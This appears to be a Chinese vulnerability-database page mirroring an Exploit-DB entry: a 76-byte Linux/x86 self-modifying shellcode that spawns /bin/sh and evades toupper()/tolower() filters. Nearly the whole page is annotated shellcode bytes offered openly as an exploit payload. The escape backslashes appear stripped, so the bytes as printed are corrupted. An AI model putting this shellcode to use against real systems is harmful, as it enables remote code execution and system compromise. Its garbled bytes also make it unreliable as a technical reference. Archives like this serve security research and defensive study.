Linux/x86 – Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)-安全小百科

Linux/x86 – Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)

漏洞ID	1054837	漏洞类型
发布时间	2004-12-22	更新时间	2004-12-22
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13421

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*-------------------------------------------------------*/
/*     Magic Byte Self Modifying Code for surviving      */
/*               toupper() & tolower()                   */
/*        76bytes execve() _exit() code by XORt          */
/*-------------------------------------------------------*/
"xebx34"               /* jmp $0x34          [revert]  */
"x5e"                   /* pop %esi                     */
/*--set-up-variables-------------------------------------*/
"x89xf7"               /* mov %esi, %edi               */
"x83xefx22"           /* sub $0x22, %edi              */
"x31xc9"               /* xor %ecx, %ecx               */
"xb1x8c"               /* mov $0x8c, %cl               */
"xd1xc9"               /* ror $0x1, %ecx    (70loops)  */
/*-scan-for-magic-byte-----------------------------------*/
"xb0x7b"               /* mov $0x7b, %al               */
"xf2xae"               /* repne scasb                  */
"xffxcf"               /* dec %edi                     */
"xac"                   /* lodsb            (al=DS:SI)  */
"x28x07"               /* subb %al, (%edi)             */
/*--loop-back-to-scanner---------------------------------*/
"xe2xf5"               /* loop -$0xe      [load-byte]  */
/*-------------------------------------[length:25bytes]--*/
//                                                       //
/*--modified-shellcode-----------------------------------*/
"x89x7bx08"           /* movl %esi, 0x8(%esi)        @*/
"x91"                   /* xchg %eax, %ecx              */
"x88x7bx07"           /* movb %al, 0x7(%esi)         @*/
"x89x7bx0c"           /* movl %eax, 0xc(%esi)        @*/
"xb0x0b"               /* movb $0xb, %al               */
"x89xf3"               /* movl %esi, %ebx              */
"x8dx7bx08"           /* leal 0x8(%esi), %ecx        @*/
"x8dx7bx0c"           /* leal 0xc(%esi), %edx        @*/
"xcdx80"               /* int $0x80                    */
"x31xdb"               /* xorl %ebx, %ebx              */
"x89xd8"               /* movl %ebx, %eax              */
"x40"                   /* inc %eax                     */
"xcdx80"               /* int $0x80                    */
/*--revert-----------------------------------------------*/
"xe8xc7xffxffxff"   /* call -$0x39                  */
/*--offset-table-----------------------------------------*/
"x05x35x35x2dx25x19x12x0dx08x13"             /**/
/*--string-to-run----------------------------------------*/
"/x7bx7bx7b/x7bx7b" /* .string "/bin/sh"            */
/*--------------------------------------[length:51bytes]-*/


// milw0rm.com [2004-12-22]

相关推荐: Linux/x86 – execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)

Linux/x86 – execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) 漏洞ID 1054670 漏洞类型发布时间 2004-09-26 更新时间 2004-09-26 CVE编号 N/A CNNVD…

文章版权归作者所有，未经允许请勿转载。

THE END